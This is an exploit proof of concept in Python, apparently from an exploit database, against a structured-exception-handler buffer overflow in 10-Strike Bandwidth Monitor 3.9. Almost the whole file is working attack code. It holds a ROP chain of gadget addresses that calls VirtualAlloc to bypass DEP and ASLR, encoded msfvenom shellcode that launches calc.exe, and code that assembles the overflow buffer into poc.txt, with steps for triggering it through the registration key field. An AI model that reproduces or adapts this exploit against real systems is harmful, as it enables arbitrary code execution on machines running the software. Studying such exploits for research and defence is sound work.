# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
#   1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
#   2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
#     - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
#   3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Protection (DEP) using Return Orientation Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
#   4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call VirtualAlloc and Bypass DEP.
#   5. Pass execution to shellcode and PopCalc.
#   - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
# Recreate:
#   Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
#   Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit

# Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------
# 0x12000000 | 0x12057000 | False  | True    | False |  False   | False  | [ssleay32.dll]
# 0x00400000 | 0x01247000 | False  | False   | False |  False   | False  | [BandMonitor.exe]
# 0x11000000 | 0x11155000 | False  | True    | False |  False   | False  | [LIBEAY32.dll]
# -------------------------------------------------------------------------------------------

import struct
OS_retSled = '\x41'*400
retSled    = '\x24\x01\x06\x11'*100 #11060124  # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}

# EAX 110E7198 <&KERNEL32.VirtualAlloc>
# ECX 00000040
# EDX 00001000
# EBX 00000001
# ESP 0014EAA4
# EBP 1202EF02 ssleay32.1202EF02
# ESI 110495EF LIBEAY32.110495EF
# EDI 01225803 BandMoni.01225803
# EIP 76C647D0 KERNEL32.VirtualAlloc

# 0014EAA0   110495EF  ....  LIBEAY32.110495EF
# 0014EAA4   1202EF02  ....  /CALL to VirtualAlloc
# 0014EAA8   0014EABC  ....  |Address = 0014EABC
# 0014EAAC   00000001  ....  |Size = 1
# 0014EAB0   00001000  ....  |AllocationType = MEM_COMMIT
# 0014EAB4   00000040  @...  \Protect = PAGE_EXECUTE_READWRITE
# 0014EAB8   110E7198  .q..  <&KERNEL32.VirtualAlloc>
# 0014EABC   110843B4  .C..  LIBEAY32.110843B4
# 0014EAC0   90909090  ....

def createRopChain():
    # rop chain generated with mona.py - www.corelan.be
    ropGadgets = [
      0x1202ef02,  # POP EBP # RETN [ssleay32.dll] 
      0x1202ef02,  # skip 4 bytes [ssleay32.dll]
      0x01215f16,  # POP EBX # RETN [BandMonitor.exe] 
      0xffffffff,  #  
      0x012175f5,  # INC EBX # RETN [BandMonitor.exe] 
      0x01056ff7,  # INC EBX # RETN [BandMonitor.exe] 
      0x011e94d4,  # POP EDX # RETN [BandMonitor.exe] 
      0xffffefff,  # Value to negate, destination value : 0x00001000
      0x01218952,  # NEG EDX # RETN [BandMonitor.exe] 
      0x011ead1b,  # DEC EDX # RETN [BandMonitor.exe] 
      0x110c5b5e,  # POP ECX # RETN [LIBEAY32.dll] 
      0xffffffff,  #  
      0x11016023,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1101597d,  # INC ECX # RETN [LIBEAY32.dll] 
      0x1202fe55,  # POP EDI # RETN [ssleay32.dll] 
      0x01225803,  # RETN (ROP NOP) [BandMonitor.exe]
      0x1105ed16,  # POP ESI # RETN [LIBEAY32.dll] 
      0x110495ef,  # JMP [EAX] [LIBEAY32.dll]
      0x012126f5,  # POP EAX # RETN [BandMonitor.exe] 
      0x110e7198,  # ptr to &VirtualAlloc() [IAT LIBEAY32.dll]
      0x110762c4,  # PUSHAD # RETN [LIBEAY32.dll] 
      0x110843b4,  # ptr to 'push esp # ret ' [LIBEAY32.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in ropGadgets)
ropChain = createRopChain()
nopSled  = '\x90'*100
# boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b '\x00\x0d\x0a' -v shellcode -a x86 -f python --platform windows
# x86/shikata_ga_nai chosen with final size 220
shellcode =  b""
shellcode += b"\xbf\xd2\xa1\xc4\xd3\xda\xdb\xd9\x74\x24\xf4"
shellcode += b"\x5e\x31\xc9\xb1\x31\x83\xc6\x04\x31\x7e\x0f"
shellcode += b"\x03\x7e\xdd\x43\x31\x2f\x09\x01\xba\xd0\xc9"
shellcode += b"\x66\x32\x35\xf8\xa6\x20\x3d\xaa\x16\x22\x13"
shellcode += b"\x46\xdc\x66\x80\xdd\x90\xae\xa7\x56\x1e\x89"
shellcode += b"\x86\x67\x33\xe9\x89\xeb\x4e\x3e\x6a\xd2\x80"
shellcode += b"\x33\x6b\x13\xfc\xbe\x39\xcc\x8a\x6d\xae\x79"
shellcode += b"\xc6\xad\x45\x31\xc6\xb5\xba\x81\xe9\x94\x6c"
shellcode += b"\x9a\xb3\x36\x8e\x4f\xc8\x7e\x88\x8c\xf5\xc9"
shellcode += b"\x23\x66\x81\xcb\xe5\xb7\x6a\x67\xc8\x78\x99"
shellcode += b"\x79\x0c\xbe\x42\x0c\x64\xbd\xff\x17\xb3\xbc"
shellcode += b"\xdb\x92\x20\x66\xaf\x05\x8d\x97\x7c\xd3\x46"
shellcode += b"\x9b\xc9\x97\x01\xbf\xcc\x74\x3a\xbb\x45\x7b"
shellcode += b"\xed\x4a\x1d\x58\x29\x17\xc5\xc1\x68\xfd\xa8"
shellcode += b"\xfe\x6b\x5e\x14\x5b\xe7\x72\x41\xd6\xaa\x18"
shellcode += b"\x94\x64\xd1\x6e\x96\x76\xda\xde\xff\x47\x51"
shellcode += b"\xb1\x78\x58\xb0\xf6\x77\x12\x99\x5e\x10\xfb"
shellcode += b"\x4b\xe3\x7d\xfc\xa1\x27\x78\x7f\x40\xd7\x7f"
shellcode += b"\x9f\x21\xd2\xc4\x27\xd9\xae\x55\xc2\xdd\x1d"
shellcode += b"\x55\xc7\xbd\xc0\xc5\x8b\x6f\x67\x6e\x29\x70"

OS_nSEH    = '\x43'*(4188-600-200-len(ropChain+nopSled+shellcode))
nSEH       = '\x44'*4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
SEH        = '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810}
extra      = '\x44'*2000
buffer  = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra
File    = 'poc.txt'
try:
    payload   = buffer
    f         = open(File, 'w')
    f.write(payload)
    f.close()
    print File + " created successfully"
except:
    print File + ' failed to create'